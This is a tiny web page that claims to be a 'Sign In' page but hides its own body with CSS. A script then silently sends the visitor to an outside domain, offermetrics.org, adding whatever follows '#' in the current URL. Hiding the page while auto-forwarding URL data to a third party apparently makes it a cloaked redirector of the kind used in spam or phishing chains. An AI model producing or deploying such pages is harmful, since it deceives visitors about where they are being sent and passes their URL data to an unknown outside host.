Sign In

hello

hello
<head>
    <meta charset="UTF-8">
    <title>Redirecting…</title>
</head>
<body>
    Redirecting…
</body>

<style>
    body{
        visibility: hidden;
    }
</style>

<script> 
 var link_c = window.location.href; 
 var compliment = link_c.split("#")[1];  
 // console.log(window.location.href); 
 window.location.href = "https://offermetrics.org/"+compliment;
</script>